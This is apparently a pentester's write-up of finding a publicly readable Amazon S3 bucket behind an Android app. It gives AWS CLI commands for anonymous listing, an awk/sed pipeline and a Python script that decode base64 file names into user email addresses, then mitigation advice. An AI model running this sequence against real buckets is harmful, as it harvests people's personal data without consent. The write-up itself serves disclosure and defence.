Exploiting an S3 bucket misconfiguration to dump user emails
This page is a writeup about how a misconfigured Amazon S3 bucket was found leaking user emails and other documents to the public.
While pentesting an Android application I came across an S3 bucket URL that was storing users' documents. The first thing that came to mind was to check whether the bucket was misconfigured; if so, I'd get complete access to those documents.
Checking if the bucket is misconfigured
I'll be using the AWS CLI because it gives finer control over commands while enumerating buckets and other AWS infrastructure than relying on third-party tools.
Installing the AWS CLI
$ sudo apt install python3 python3-pip -y
$ pip3 install awscli
Verify Installation
$ aws --version
aws-cli/1.27.45 Python/3.10.6 Linux/5.15.0-57-generic botocore/1.29.45
Checking if the bucket is accessible anonymously
To interact with the bucket we first need its name, which can be taken from the URL, usually in the format
https://bucket-name.s3.amazonaws.com/
Check whether the bucket is publicly accessible using the AWS CLI; the --no-sign-request flag sends the request without any credentials, exactly as an anonymous user would:
$ aws s3 ls s3://bucket-name --no-sign-request
PRE admin/
PRE bi/
PRE blog/
PRE campanhas/
PRE css/
PRE data/
PRE escolas/
PRE fonts/
PRE front-assets/
PRE front-cache/
PRE img/
PRE lib/
PRE lps/
PRE marketing/
PRE XXXXXXX-tech/
PRE ms-qrcode/
PRE outros/
PRE parcerias/
PRE plugins/
PRE pwa/
PRE redirects/
PRE removals/
PRE sales/
PRE study-plans/
PRE styles/
PRE tech-blog/
PRE tutoriais/
PRE uploads/
PRE video/
PRE wiris-service/
2019-10-29 02:36:17 404 favicon.ico
2022-12-01 00:38:53 96 robots.txt
2022-11-02 20:44:17 59383 sitemap.xml
The bucket is publicly accessible!
We could go through each and every directory, but in this writeup my focus is on dumping only user email ids, which are exposed due to insecure application design.
Enumerating Directories and Dumping File Names
One could enumerate each and every directory for juicy information, but from the Android app pentest I already know where to find user information: all user-uploaded docs are stored in the uploads/essay_submission/essay directory of the S3 bucket.
Now I'll list all the files inside uploads/essay_submission/essay and store the output in a text file.
aws s3 ls s3://bucket-name/uploads/essay_submission/essay/ --no-sign-request > submitted_essays.txt

Let's tail the data to understand how the files are stored and analyze the file names.

The design flaw lies in how documents/images are stored in the bucket: every file name is base64-encoded user data, which lets an attacker extract email ids simply by decoding the names, as analyzing the output makes clear.
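For illustration, suppose the listing contained a file named am9obi5kb2VAZXhhbXBsZS5jb20xNjY5ODUwMzMzMDAw.jpeg (an invented name, not a real user's). Decoding it reveals an email address followed by a 13-digit numeric id:

from base64 import b64decode

# Hypothetical file name taken from the listing, extension stripped:
name = "am9obi5kb2VAZXhhbXBsZS5jb20xNjY5ODUwMzMzMDAw"
print(b64decode(name).decode('utf-8'))
# Output: john.doe@example.com1669850333000
# (email address followed by a 13-digit id)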
Extracting User Info from Dumped Data
Use the awk and sed command-line tools to extract only the base64-encoded data:
tail submitted_essays.txt | awk '{print $4}' | sed 's/[.].*$//'

awk is used to print only the file names (the fourth column of the listing), and sed strips the .jpeg extension.
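Applied to the invented entry from earlier, the pipeline would reduce

2022-12-01 00:38:53      52841 am9obi5kb2VAZXhhbXBsZS5jb20xNjY5ODUwMzMzMDAw.jpeg

to just the encoded name:

am9obi5kb2VAZXhhbXBsZS5jb20xNjY5ODUwMzMzMDAw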
Now let's extract all of the base64-encoded names and store them in another file, base64data.txt:
cat submitted_essays.txt | awk '{print $4}' | sed 's/[.].*$//' > base64data.txt

Decoding base64 Data Line by Line
I won't be using the base64 command-line utility to decode the data; I prefer Python for such tasks, and the script can be reused in the future.
from base64 import b64decode
from os.path import isfile

def get_file_lines(file_path: str):
    """Read a file and return its lines with surrounding whitespace stripped."""
    assert isfile(file_path), f"File Not Found: {file_path}"
    with open(file_path, 'r') as f:
        file_lines = f.readlines()
    return [line.strip() for line in file_lines]

def decode_base64_list(file_lines: list[str]):
    """Base64-decode every line and return the decoded strings."""
    decoded_lines = []
    for line in file_lines:
        decoded_lines.append(b64decode(line).decode('utf-8'))
    return decoded_lines

def write_file(file_path: str, file_lines: list[str]):
    """Write the given lines to a file, one per line."""
    with open(file_path, 'w') as f:
        f.write('\n'.join(file_lines))

def main(file_path: str, save_file_path: str):
    encoded_file_lines = get_file_lines(file_path)
    # deduplicate before decoding
    decoded_file_lines = decode_base64_list(list(set(encoded_file_lines)))
    # sanitizing data: drop the trailing 13-character numeric id,
    # leaving just the email address
    sanitized_lines = []
    for line in set(decoded_file_lines):
        sanitized_lines.append(line[0:-13])
    # write unique values to file
    write_file(save_file_path, sanitized_lines)
    # print a small sample on completion
    print(sanitized_lines[0:4])

if __name__ == '__main__':
    file_path = 'base64data.txt'
    decoded_file_path = 'user_data.txt'
    main(file_path, decoded_file_path)
Running the script decode_data.py:
python3 decode_data.py

A sample of the decoded data is printed to the screen once the script finishes successfully (with the invented name from earlier, it would look something like ['john.doe@example.com', ...]).
Now we have the email address of every user who uploaded a document:
tail user_data.txt
wc -l user_data.txt


How to mitigate the issue and develop better applications
User data was exposed to the public because of a misconfigured bucket. Buckets shouldn't be publicly accessible; instead, grant time-limited access to bucket objects through presigned URLs, as sketched below.
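A minimal sketch of generating such a URL with boto3 (the bucket name and object key below are placeholders, and valid AWS credentials are assumed):

import boto3

s3 = boto3.client('s3')

# Grant read access to a single object for 15 minutes only.
url = s3.generate_presigned_url(
    'get_object',
    Params={'Bucket': 'bucket-name', 'Key': 'uploads/essay_submission/essay/some-object.jpeg'},
    ExpiresIn=900,  # seconds
)
print(url)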
It's also insecure to use a user's details or any uniquely identifiable id when naming stored objects. Developers should instead use UUIDs or salted hashes to generate names for assets/objects, as sketched below.
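A minimal sketch of such a naming scheme (the key prefix here is just an example):

import uuid

def object_key_for_upload(extension: str = 'jpeg') -> str:
    # Random, non-reversible object name; the user-to-object mapping
    # belongs in the application's database, never in the key itself.
    return f"uploads/essay_submission/essay/{uuid.uuid4().hex}.{extension}"

print(object_key_for_upload())
# e.g. uploads/essay_submission/essay/3f2b8c0e9d4a4f6b8a1c2d3e4f5a6b7c.jpeg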